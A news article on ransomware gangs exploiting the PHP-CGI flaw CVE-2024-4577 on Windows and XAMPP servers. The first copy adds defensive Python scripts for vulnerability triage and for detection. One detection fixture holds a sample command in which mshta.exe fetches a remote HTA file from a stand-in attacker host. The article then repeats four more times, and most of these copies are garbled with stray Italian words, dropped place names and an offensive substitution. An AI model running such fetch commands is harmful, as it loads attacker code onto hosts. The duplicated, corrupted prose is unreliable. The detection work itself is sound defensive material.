
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability in PHP that lets attackers run malicious code on web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, down from 1,800 detected on Monday. The servers, primarily located in China, no longer display their usual content; instead, many list the site’s file directory, which shows that every file has been given a .locked extension, indicating it has been encrypted. An accompanying ransom note demands roughly $6,500 in exchange for the decryption key.

When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from the way PHP on Windows handles the conversion of Unicode characters into ASCII. A Windows feature known as Best Fit silently maps certain characters to the closest ASCII equivalent, which lets attackers use a technique known as argument injection: user-supplied input is converted into characters that the PHP-CGI binary interprets as command-line options, passing attacker-controlled settings and, ultimately, malicious commands to the PHP application. The exploit bypasses the fix for CVE-2012-1823, a critical code-execution vulnerability in PHP-CGI that was patched in 2012.
CVE-2024-4577 affects PHP only when it runs in a mode known as CGI, in which the web server launches the PHP-CGI executable to handle each request and passes the request data to it for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe sit in directories that the web server exposes to clients. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows locale (the setting that adapts the OS to the user’s language) must be set to either Chinese or Japanese.
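Turning those conditions into a quick triage check, as an added example that is not part of the article or of any vendor tooling: the script below takes a PHP version string, the Windows ANSI code page, an Apache httpd configuration excerpt and the PHP install directory, and reports whether the deployment matches the exposed-php-cgi.exe configuration described above. The sample httpd.conf is constructed (a ScriptAlias pointing at the PHP directory, the shape of the XAMPP default), the fixed version numbers come from the June 6 PHP releases, and the code-page-to-locale mapping and the Alias/ScriptAlias parsing are assumptions of this example, not something the article states.

```python
import re
from pathlib import PureWindowsPath

# First releases on each supported branch carrying the CVE-2024-4577 fix
# (PHP 8.1.29, 8.2.20 and 8.3.8, published June 6, 2024). Older branches are
# end-of-life and received no fix, so any 8.0.x or 7.x build counts as unpatched.
FIXED_PATCH = {(8, 1): 29, (8, 2): 20, (8, 3): 8}

# Windows ANSI code pages for the locales the article names as confirmed
# vulnerable: 932 = Japanese, 936 = Simplified Chinese, 950 = Traditional Chinese.
# Assumption: only these are treated as the "Chinese or Japanese" condition.
CJK_CODEPAGES = {932, 936, 950}

# Apache Alias/ScriptAlias directives: "<directive> <url-prefix> <filesystem path>".
ALIAS_RE = re.compile(r'^\s*(ScriptAlias|Alias)\s+(\S+)\s+"?([^"\s]+)"?', re.M)

# Constructed httpd.conf excerpt for the demo; the /php-cgi/ alias mirrors the
# shape of the XAMPP default the article describes.
SAMPLE_HTTPD_CONF = """
Alias /phpmyadmin "C:/xampp/phpMyAdmin/"
ScriptAlias /php-cgi/ "C:/xampp/php/"
ScriptAlias /cgi-bin/ "C:/xampp/cgi-bin/"
"""


def php_is_patched(version: str) -> bool:
    """True if this PHP version is at or above the first fixed release of its branch."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised PHP version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if (major, minor) > max(FIXED_PATCH):
        return True  # branches released after 8.3 already include the fix
    fixed = FIXED_PATCH.get((major, minor))
    return fixed is not None and patch >= fixed


def _norm(path: str) -> str:
    """Case-insensitive, forward-slash form of a Windows path without a trailing slash."""
    return PureWindowsPath(path).as_posix().lower().rstrip("/")


def exposed_cgi_urls(httpd_conf: str, php_dir: str) -> list:
    """URL prefixes whose Alias/ScriptAlias target is (or contains) the PHP directory,
    i.e. places where php-cgi.exe can be reached directly over HTTP."""
    want = _norm(php_dir)
    hits = []
    for _directive, url, target in ALIAS_RE.findall(httpd_conf):
        got = _norm(target)
        if want == got or want.startswith(got + "/"):
            hits.append(url)
    return hits


def current_ansi_codepage():
    """On Windows, read the active ANSI code page from the OS; elsewhere return None."""
    try:
        import ctypes
        return ctypes.windll.kernel32.GetACP()
    except AttributeError:  # not running on Windows
        return None


def assess(version: str, ansi_codepage, httpd_conf: str, php_dir: str) -> dict:
    """Combine the three conditions from the article into one report."""
    report = {
        "patched": php_is_patched(version),
        "cjk_locale": ansi_codepage in CJK_CODEPAGES,
        "exposed_urls": exposed_cgi_urls(httpd_conf, php_dir),
    }
    # Unpatched build + php-cgi.exe reachable over HTTP + CJK locale is the
    # combination described for the XAMPP default. A deployment that runs PHP as
    # a CGI handler without aliasing the binary directory is not covered here.
    report["at_risk"] = (not report["patched"]) and report["cjk_locale"] and bool(report["exposed_urls"])
    return report


if __name__ == "__main__":
    print(assess("8.2.12", 936, SAMPLE_HTTPD_CONF, r"C:\xampp\php"))
```

On a real host, feed `assess()` the output of `php -v`, the value returned by `current_ansi_codepage()`, and the contents of the httpd configuration files (XAMPP keeps its aliases in a separate include alongside httpd.conf). A report with `at_risk` false but `exposed_urls` non-empty still deserves attention: the aliased php-cgi.exe is an unnecessary exposure regardless of locale.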
The critical vulnerability was published on June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted on an attacker-controlled server. Use of the binary indicates an approach known as living off the land, in which attackers use native OS functionality and tools in an attempt to blend in with normal, non-malicious activity.
In a post published Friday, Censys researchers said that the exploitation by the TellYouThePass gang started on June 7 and mirrored past incidents in which attackers opportunistically mass-scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately target any accessible server. The vast majority of the infected servers have IP addresses geolocated to China, Taiwan, Hong Kong, or Japan, likely because Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said in an email.
Since then, the number of infected sites, detected by observing a public-facing HTTP response that serves an open directory listing of the server’s filesystem together with the distinctive file-naming convention of the ransom note, has fluctuated from a low of 670 on June 8 to a high of 1,800 on Monday.
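The two observations above, the mshta.exe launch under the PHP process on a compromised host and the public directory listing of .locked files that Censys counts, both translate into simple detection logic. The Python below is an added example, not code from Censys or Imperva: the process-creation events and the directory-listing HTML are constructed samples, the attacker hostname uses the reserved .example domain, and the ransom-note filename pattern is a placeholder assumption to be replaced with the real name from the Imperva indicators.

```python
import re
from html.parser import HTMLParser

# ---- 1. Host telemetry: mshta.exe launched under a PHP/Apache process with a remote HTA ----

PHP_WEB_IMAGES = {"php-cgi.exe", "php.exe", "httpd.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_mshta_from_php(events) -> list:
    """Return process-creation events where mshta.exe, pointed at a URL, has a PHP or
    Apache process anywhere in its ancestry. Each event is a dict with 'image',
    'cmdline' and 'ancestors' (parent first), the shape of a Sysmon Event ID 1 record
    enriched with a process tree by an EDR; that shape is an assumption of this example."""
    hits = []
    for ev in events:
        if _basename(ev["image"]) != "mshta.exe":
            continue
        if not REMOTE_URL.search(ev["cmdline"]):
            continue  # a local .hta launched by a user is not this pattern
        if any(_basename(a) in PHP_WEB_IMAGES for a in ev["ancestors"]):
            hits.append(ev)
    return hits


# Constructed sample events. The first is the chain the article describes
# (PHP -> cmd -> mshta fetching a remote HTA); the others are benign noise.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://attacker.example/x.hta",
     "ancestors": [r"C:\Windows\System32\cmd.exe", r"C:\xampp\php\php-cgi.exe",
                   r"C:\xampp\apache\bin\httpd.exe"]},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\dev\tool.hta",
     "ancestors": [r"C:\Windows\explorer.exe"]},
    {"image": r"C:\xampp\php\php-cgi.exe",
     "cmdline": "php-cgi.exe",
     "ancestors": [r"C:\xampp\apache\bin\httpd.exe"]},
]


# ---- 2. Network side: an open directory listing of .locked files plus a ransom note ----

class _LinkCollector(HTMLParser):
    """Collect href values from an autoindex-style listing."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


# Placeholder: the real TellYouThePass note name should be taken from the Imperva IOCs.
DEFAULT_NOTE_PATTERN = r"(?i)^read_?me.*\.html?$"


def looks_ransomed(body: str, note_pattern: str = DEFAULT_NOTE_PATTERN, min_locked: int = 3) -> bool:
    """True when the listing shows at least `min_locked` files with a .locked
    extension and one filename matching the ransom-note pattern."""
    parser = _LinkCollector()
    parser.feed(body)
    names = [h.rstrip("/").rsplit("/", 1)[-1] for h in parser.hrefs]
    files = [n for n in names if n and not n.startswith("?")]  # drop sort links and parent dir
    locked = [n for n in files if n.lower().endswith(".locked")]
    has_note = any(re.search(note_pattern, n) for n in files)
    return len(locked) >= min_locked and has_note


# Constructed Apache-style listing resembling what the article describes.
SAMPLE_LISTING = """<html><head><title>Index of /</title></head><body>
<h1>Index of /</h1><pre><a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a>
<hr><a href="/">Parent Directory</a>
<a href="index.php.locked">index.php.locked</a>
<a href="config.php.locked">config.php.locked</a>
<a href="assets/">assets/</a>
<a href="README_TO_DECRYPT.html">README_TO_DECRYPT.html</a>
<a href="robots.txt.locked">robots.txt.locked</a>
</pre></body></html>"""

if __name__ == "__main__":
    print(len(flag_mshta_from_php(SAMPLE_EVENTS)), looks_ransomed(SAMPLE_LISTING))
```

The host-side check keys on ancestry rather than the direct parent because PHP on Windows typically spawns a command through cmd.exe before mshta.exe appears; matching only parent = php-cgi.exe would miss the chain. The listing check is the same idea Censys applies at Internet scale, and it is cheap to run against your own externally reachable hosts.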

Censys researchers said in an email that they’re not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI or XAMPP service stops responding—hence the drop in detected infections,” they wrote. “Another point to consider is that there are currently no observed ransom payments to the only Bitcoin address listed in the ransom note (source). Based on these facts, our intuition is that this is likely the result of those services being decommissioned or going offline in some other manner.”
XAMPP used in production, really?
The researchers went on to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount, since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote in an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP on any Windows system should install the update as soon as possible; installations on end-of-life branches (PHP 8.0 and older) received no fix and need to be upgraded to a supported release. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted in the attacks.

Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.

Censys

Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.

Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.

Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.

Censys

Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.

Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.

Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.

Censys

Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.

Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.

Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.

Censys

Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.

Censys
Censys researchers said per mezzo di an email that they’sire not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI ora XAMPP service stops responding—hence the drop per mezzo di detected infections,” they wrote. “Another point to consider is that there are currently risposta negativa observed ransom payments to the only Bitcoin address listed per mezzo di the ransom taccuino (source). Based acceso these facts, our intuition is that this is likely the result of those services being decommissioned ora going offline per mezzo di some other manner.”
XAMPP used per mezzo di production, really?
The researchers went acceso to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote per mezzo di an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP acceso any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted per mezzo di the attacks.

Getty Images
Ransomware criminals have quickly weaponized an easy-to-exploit vulnerability per mezzo di the PHP programming language that executes malicious code acceso web servers, security researchers said.
As of Thursday, Internet scans performed by security firm Censys had detected 1,000 servers infected by a ransomware strain known as TellYouThePass, mongoloide from 1,800 detected acceso Monday. The servers, primarily located per mezzo di , risposta negativa longer display their usual content; instead, many list the site’s file directory, which shows all files have been given a .locked extension, indicating they have been encrypted. An accompanying ransom note demands roughly $6,500 per mezzo di exchange for the decryption key.

Censys

Censys
When opportunity knocks
The vulnerability, tracked as CVE-2024-4577 and carrying a severity rating of 9.8 out of 10, stems from errors per mezzo di the way PHP converts Unicode characters into ASCII. A feature built into Windows known as Best Fit allows attackers to use a technique known as argument injection to convert user-supplied ingresso into characters that pass malicious commands to the main PHP application. Exploits allow attackers to bypass CVE-2012-1823, a critical code execution vulnerability patched per mezzo di PHP per mezzo di 2012.
CVE-2024-4577 affects PHP only when it runs per mezzo di a mode known as CGI, per mezzo di which a web server parses HTTP requests and passes them to a PHP script for processing. Even when PHP isn’t set to CGI mode, however, the vulnerability may still be exploitable when PHP executables such as php.exe and php-cgi.exe are per mezzo di directories that are accessible by the web server. This configuration is extremely rare, with the exception of the XAMPP platform, which uses it by default. An additional requirement appears to be that the Windows tipico—used to personalize the OS to the local language of the user—must be set to either Chinese ora Japanese.
The critical vulnerability was published acceso June 6, along with a security patch. Within 24 hours, threat actors were exploiting it to install TellYouThePass, researchers from security firm Imperva reported Monday. The exploits executed code that used the mshta.exe Windows binary to run an HTML application file hosted acceso an attacker-controlled server. Use of the binary indicated an approach known as living the land, per mezzo di which attackers use native OS functionalities and tools per mezzo di an attempt to blend per mezzo di with normal, non-malicious activity.
Per a post published Friday, Censys researchers said that the exploitation by the TellYouThePass cricca started acceso June 7 and mirrored past incidents that opportunistically mass scan the Internet for vulnerable systems following a high-profile vulnerability and indiscriminately targeting any accessible server. The vast majority of the infected servers have IP addresses geolocated to , Taiwan, Hong Kong, ora Japan, likely stemming from the fact that Chinese and Japanese locales are the only ones confirmed to be vulnerable, Censys researchers said per mezzo di an email.
Since then, the number of infected sites—detected by observing the public-facing HTTP response serving an gara open directory listing showing the server’s filesystem, along with the distinctive file-naming convention of the ransom note—has fluctuated from a low of 670 acceso June 8 to a high of 1,800 acceso Monday.

Censys
Censys researchers said in an email that they’re not entirely sure what’s causing the changing numbers.
“From our perspective, many of the compromised hosts appear to remain online, but the port running the PHP-CGI or XAMPP service stops responding—hence the drop in detected infections,” they wrote. “Another point to consider is that there are currently no observed ransom payments to the only Bitcoin address listed in the ransom note (source). Based on these facts, our intuition is that this is likely the result of those services being decommissioned or going offline in some other manner.”
XAMPP used in production, really?
The researchers went on to say that roughly half of the compromises observed show clear signs of running XAMPP, but that estimate is likely an undercount since not all services explicitly show what software they use.
“Given that XAMPP is vulnerable by default, it’s reasonable to guess that most of the infected systems are running XAMPP,” the researchers said. This Censys query lists the infections that are explicitly affecting the platform. The researchers aren’t aware of any specific platforms other than XAMPP that have been compromised.
The discovery of compromised XAMPP servers took Will Dormann, a senior vulnerability analyst at security firm Analygence, by surprise because XAMPP maintainers explicitly say their software isn’t suitable for production systems.
“People choosing to run not-for-production software have to deal with the consequences of that decision,” he wrote in an online interview.
While XAMPP is the only platform confirmed to be vulnerable, people running PHP on any Windows system should install the update as soon as possible. The Imperva post linked above provides IP addresses, file names, and file hashes that administrators can use to determine whether they have been targeted in the attacks.
